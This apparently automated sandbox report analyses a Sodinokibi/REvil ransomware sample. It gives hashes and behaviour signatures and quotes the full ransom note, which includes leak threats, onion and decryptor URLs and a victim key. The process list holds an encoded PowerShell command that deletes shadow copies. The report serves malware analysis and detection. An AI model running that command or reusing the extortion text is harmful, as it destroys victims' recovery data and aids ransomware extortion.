Analysis

  • max time kernel
    138s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-08-2023 00:38

General

  • Target

    adb.vbs.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10

Malware Config

Extracted

Path

C:\Recovery\5096oaz7g-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5096oaz7g. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F9647201020B5202 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F9647201020B5202 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Ck1WfWwYd2Jo7SjX2GkCBc/PlfBOZRwskJFd1NHpIBo3c28cNWsVrIYnf+IgeCqF iPWs5SFOwg8iphU80wIfYnFDehXJnOyN56Hd7eoliU1UYdMK14rFuAaoilOmNi3N +gSz6BdD5CcKjkQkcM+qX7vE6BhxE6Ltznj3D7UtPkVaifACUpgCZz44K0p6c8OI P4ZtVOeMOGhCeTL4NPJUe6ucjFQMoXdpZtuA4Wn04ZLOZy6vnPTDmQknj9QMP9uG 4jMGurnfFVh9VLyD7zLL/jmOH8sUZKS4M5rj5Gh6tFvH5iiIEuOiIxrkjx164/Ty BoKYt1eewTxO+fh92Jh2BJdXN/a91Vlv7hIBwI2DKdNVLVefDzl7OKObFULfRvMj wpUPoUKLW/DYT6kUdDCMLor8smWDz961YoH90/jefXWs/6fcXQ7jDa/4BoS3WjBT 6xHYQezq5IVicaGV1LRW7VzEKOqx24FcRGhOgIy3lUthndGuC02nmKsAg2utBUjC CGjNdsDHClM6MD/QEicOJsK66VWoh2fqRyqUSoGJVP9kRkm3jOI7eFAHZMTxf971 k7GHDOJ5RuawpQXI4Ao+pggRbNDbj4cklmnuW+OeEQzYLP0o3nRcVp36MQILvneZ 3rYDb5IM+Zy899yxea7rXyV84xunn1GP6olBjN4nwP5Ot6r+RNQ15ptYtYzOJztg TJePtN0whz2ZWtkgn6XlUfiBn8mGSsud6eTjN30twvYap78p8AI5+FtR2ft9XFzv zfBQrgmfAXy0qz5D9rBxE7WnLalLB42I6v2yGs6p9D1/jqQ8XldgCG3+u93OgmTl lyUA/QEEySps9dV63QsBqbCMuWYYidEWj1ibI7eFpbBMTTIHu8rZqhkLR4qLxFHa 6+2RTOtgwOFz6l58diqFomg/oFfyGsZCB0xaHjn9FgWk6R/eb1NbBPS0WlT4Fnmh lly4AHhKZ5nOMfkV7kzBvcbZ3pMpYX/pnWRoLYW9djot1oI4EkcXXflosWC0ka7M /aNej+Blen+aVFn3etotUDImF3kmPtrUTyN9UG3uqIZwY3Az8R1rzCxK5gFEaL8t wYqrdbpysnxloAYY8ABcMg+ppQj2MiBGeXXlTEsE7y6WQqVHuNb4HZjwZsRmMm/i HDnZu3ZN0Ci482QpwpUkfR1jKZdoyoUw43AqvImIUOtIJDYECIGhpVoz6Jjg4lSD tC0wPALXKXZ8smcoqQprrb/Sz0V79XEAaMLL/K3IxtqJfCYKsiQfA5vY1+WY5ANh TlY35UPwP4tlZNHyHFzW3nFAQ5M7pRMzQf0g0gktMYw5xLzFpc1FUsBX505+FrWW tKgBpu4tzpFA9ri9lNyUj+8/scTWsaEzVRxGs9YiOxW/39NPhb1BMhHqSA4= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F9647201020B5202

http://decryptor.cc/F9647201020B5202

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4492
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:3916
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4192

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\5096oaz7g-readme.txt
      Filesize

      7KB

      MD5

      ee695905298749c0812d45485a57bf91

      SHA1

      302ad49e2701e3ac8228d3c213d36bfc33244ef7

      SHA256

      cf3a575f5e8b134dcd19f21b348a15f5fef0c8ba6ce7d96e3e5d961d7a767b61

      SHA512

      7cd42033eb1c7d3e9a9fc0d349cf8cf2ff4669bb67087491051a0f1ccaf65261700529dfa072ce48c96c463aeceb3d5329e2678e6026da4c32b60ac00087b2bd

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubuc1vzl.bto.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4492-142-0x0000026A31820000-0x0000026A31842000-memory.dmp
      Filesize

      136KB

    • memory/4492-143-0x00007FF9A92A0000-0x00007FF9A9D61000-memory.dmp
      Filesize

      10.8MB

    • memory/4492-145-0x0000026A30E00000-0x0000026A30E10000-memory.dmp
      Filesize

      64KB

    • memory/4492-144-0x0000026A30E00000-0x0000026A30E10000-memory.dmp
      Filesize

      64KB

    • memory/4492-146-0x0000026A30E00000-0x0000026A30E10000-memory.dmp
      Filesize

      64KB

    • memory/4492-149-0x00007FF9A92A0000-0x00007FF9A9D61000-memory.dmp
      Filesize

      10.8MB